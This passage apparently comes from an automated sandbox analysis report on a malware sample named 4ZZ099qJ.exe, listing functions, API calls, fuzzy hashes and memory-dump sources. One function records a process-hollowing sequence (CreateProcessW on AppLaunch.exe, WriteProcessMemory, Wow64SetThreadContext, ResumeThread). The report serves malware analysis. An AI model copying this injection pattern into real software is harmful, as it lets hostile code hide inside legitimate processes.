Instruction Fuzzy Hash: AD1123B5D002498FCB10CF9AD544ACEFBF4AF88325F14845AD528B7210C774A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D7E098 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D7E0FE

Memory Dump Source

Source File: 00000005.00000002.1825948583.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d70000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 08cf0fe5298c60261eaeee1aea12c62521af94be8ffd68a2f47db41136cdcc16
Instruction ID: b35105e20ebfed6885e256706d35cd0782da2596170ceeb7cda9c1b83c060725
Opcode Fuzzy Hash: 08cf0fe5298c60261eaeee1aea12c62521af94be8ffd68a2f47db41136cdcc16
Instruction Fuzzy Hash: D611DFB6C007498FDB10CF9AD844ADEFBF4AB88324F14C46AD869A7210D375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0087D774 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825593407.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_87d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcb9b2d1ba83f2baf70b580cf14cff54d8d26b8eb20ecf891d49a97fd079ff1
Instruction ID: 755a0ddd5f4c181d632613ea7771cc970adb7ae4d0e93b5475191e98e0a8c8ed
Opcode Fuzzy Hash: 6fcb9b2d1ba83f2baf70b580cf14cff54d8d26b8eb20ecf891d49a97fd079ff1
Instruction Fuzzy Hash: D321D371500344DFCB059F14D9C0B26BBB5FF88318F24C579D90D9A259C33AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0087D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825593407.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_87d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c006b4a79679e976c250703c2779c069aae8607105e566790e8714de401621
Instruction ID: b13529c0c9c6618872330d0a66f13dbb7342c32847d1e2c097c82b96782887db
Opcode Fuzzy Hash: 93c006b4a79679e976c250703c2779c069aae8607105e566790e8714de401621
Instruction Fuzzy Hash: 8C210371504344DFCB05DF14D9C0B26BF75FF94318F24C669D9098B25AC336D856CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0088D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825637699.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_88d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d9d9741747163ffb77a7fc179e1ceb2aff5c9bfb267fdbfdee9a3e222d49a4d
Instruction ID: 9b9db3accae8f5107d2b4d563851a1ad2c179d2e73b4fb75c81a2db12a2f1832
Opcode Fuzzy Hash: 1d9d9741747163ffb77a7fc179e1ceb2aff5c9bfb267fdbfdee9a3e222d49a4d
Instruction Fuzzy Hash: 53212271604704DFCB14EF14D984B26BBA1FB84318F20C569D8098B396C33AD847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0087D76F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825593407.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_87d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af571a8072d0dd06b83227ef23aab6134eafaf101585d62cdefd210654407788
Instruction ID: 832c2f40f9cbea2a3792615162d8d6f108536e67bb22043614959756e016c626
Opcode Fuzzy Hash: af571a8072d0dd06b83227ef23aab6134eafaf101585d62cdefd210654407788
Instruction Fuzzy Hash: A5219D76504280DFCB16CF14D9C4B16BF72FF98314F28C6A9D9494A61AC33AD866CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0087D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825593407.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_87d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
Instruction ID: 87d8bdf62c23050b83432db006aee06a27307b080fdb9245b6e0b0852a6db81c
Opcode Fuzzy Hash: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
Instruction Fuzzy Hash: 2811AF76504280CFCB16CF14D9C4B16BF71FB94328F28C6A9D8494B61AC336D85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0088D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1825637699.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_88d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction ID: 0368e39ebc2e8f58bb5927c893cdb445af1e2e4cc9529b2503eb83278b1cf2ff
Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
Instruction Fuzzy Hash: 3C11BB75504780CFDB11DF14D5C4B16BBA1FB84318F28C6AAD8498B696C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4ZZ099qJ.exePID: 5828, Parent PID: 6588COMMON

Executed Functions

Function 00E835E4 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 310
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00E8F151

Strings

ridding, xrefs: 00E8F2F7
D, xrefs: 00E8F0AD
D, xrefs: 00E8F0EF
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00E8F100
'&e{, xrefs: 00E8F179

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: '&e{$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe$D$D$ridding
API String ID: 963392458-4294493744
Opcode ID: 0f7c7e6bc60d31b57d1b5a9252bfc99d2ffdbc57dfb6323f8270712e6ca6551e
Instruction ID: 38225fd142c0ecfeb2caf99a8ddff0f962bf261250b5ebef7e3bc850b51e36aa
Opcode Fuzzy Hash: 0f7c7e6bc60d31b57d1b5a9252bfc99d2ffdbc57dfb6323f8270712e6ca6551e
Instruction Fuzzy Hash: FDE111B0904214CFDB14EF68C884799BBF0BF88318F1185ADE49DAB341D7759985CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F30612 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,57FC35AD,?,00F30751,?,?), ref: 00F306D3

Strings

ext-ms-, xrefs: 00F3067D
api-ms-, xrefs: 00F30669

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: f70ab574372b330fd3752e24f5c44f014f960a1d17ad02b3d3fc43a4868d07e6
Instruction ID: 1ac568836a402dcccd02edcd043f2aa6fde0f9e2c347f1d2d455397f01dd6221
Opcode Fuzzy Hash: f70ab574372b330fd3752e24f5c44f014f960a1d17ad02b3d3fc43a4868d07e6
Instruction Fuzzy Hash: 86212732E01611EBD731AE21DC56B6A3768AB817B0F340121E956A7288EF34ED10D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8F376 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
threadinjectionprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00E8F151
TerminateProcess.KERNELBASE ref: 00E8F3AB
WriteProcessMemory.KERNELBASE ref: 00E8F449
WriteProcessMemory.KERNELBASE ref: 00E8F49D
Wow64SetThreadContext.KERNEL32 ref: 00E8F4CA
ResumeThread.KERNELBASE ref: 00E8F4F6

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00E8F100

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: Process$MemoryThreadWrite$ContextCreateResumeTerminateWow64
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 2930257069-448403072
Opcode ID: e14b9a118c95079bb85692bf8f19bcbc8f10ec4ff21da966a2c586c228a024d1
Instruction ID: ddad8cc1edf0ecf129dabf15abeb8bc1d83c2d2d34a76780015e06b3da65897b
Opcode Fuzzy Hash: e14b9a118c95079bb85692bf8f19bcbc8f10ec4ff21da966a2c586c228a024d1
Instruction Fuzzy Hash: 9F112B70809345CFDB10AF64D45839EBBF0FB54318F10996DD49D6A282D7798689CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00EFD0B5 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00EFD08A,?,?,?,?,57FC35AD), ref: 00EFD0C6
TerminateProcess.KERNEL32(00000000,?,00EFD08A,?,?,?,?,57FC35AD), ref: 00EFD0CD
ExitProcess.KERNEL32 ref: 00EFD0DF

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f9c513dad393fa2f6d8d3166d40bd1bcf395b0af9879f939ad25fb55e0b1073c
Instruction ID: 98d9ec5b373fd89b89bc945c7c3a8475f45bfddd08e1a6723806d2babb039f48
Opcode Fuzzy Hash: f9c513dad393fa2f6d8d3166d40bd1bcf395b0af9879f939ad25fb55e0b1073c
Instruction Fuzzy Hash: 57D09E3100420DEFCF313F60DD0D9697F7BAF45795BA49010FA4955025DF7A9952DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E820B3 Relevance: 3.2, APIs: 2, Instructions: 192
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F3DFF0: GetConsoleOutputCP.KERNEL32(57FC35AD,?,00000000,?), ref: 00F3E053

WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00F3EC93
GetLastError.KERNEL32 ref: 00F3EC9D

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 22f9ba8baba807f9070ed02a615d48d0cc03ffaa79a9d7ae5a16ae22627f5e01
Instruction ID: 9d9e65f6448fc2faeadd9e44a982999c64789a994a2e298ed4fc760821131bcf
Opcode Fuzzy Hash: 22f9ba8baba807f9070ed02a615d48d0cc03ffaa79a9d7ae5a16ae22627f5e01
Instruction Fuzzy Hash: F661B372D04149AFDF11DFA8C884FEEBBB8AF49324F144095F855A7292D336D901EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F3E5D5 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,?,00F3EC79,?,?,?,?), ref: 00F3E671
GetLastError.KERNEL32(?,00F3EC79,?,?,?,?), ref: 00F3E697

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 9aec9a109ed01f4b3438ce62ca1bc76508cf79daf80804811c5a01c0350feb91
Instruction ID: 1f10176d0e6971822a8c89b2c54d498ebced5b7134123144762f9cace2390b1a
Opcode Fuzzy Hash: 9aec9a109ed01f4b3438ce62ca1bc76508cf79daf80804811c5a01c0350feb91
Instruction Fuzzy Hash: 5B21D331A00219DFCF25DF29C8819E9B7F9EF58311F2440AAE94AD7251D630DE42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F31663 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00F31770,01023B78,0000000C), ref: 00F316AF
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00F31770,01023B78,0000000C), ref: 00F316C1

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c0001fd0846c02c74af9724ede5ecc15a425908363539f361c07d1164104a4a2
Instruction ID: bd166f692935c949330d54436d8d7148cb76b5f5ecceae2f05d8dffa91edf498
Opcode Fuzzy Hash: c0001fd0846c02c74af9724ede5ecc15a425908363539f361c07d1164104a4a2
Instruction Fuzzy Hash: 0011D3B2A047418AC7304EBE8C89622BA94B757371F3D071ED0F6C62F1C735D886E650

Uniqueness

Uniqueness Score: -1.00%

Function 00E864C4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5ec8e82d13e3c24e2f3d5c234757bd7b0e730a0e7ed9f13f7804e47253aa7a
Instruction ID: e2a230436cb26de2dcf81c325c131f13358b8bf8869f289d349c5065a32e1084
Opcode Fuzzy Hash: 3e5ec8e82d13e3c24e2f3d5c234757bd7b0e730a0e7ed9f13f7804e47253aa7a
Instruction Fuzzy Hash: 432114B1D102088FDB04EFA9D8457DDBBF0FB48324F00522AE42DBB390DB7945448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F3070F Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
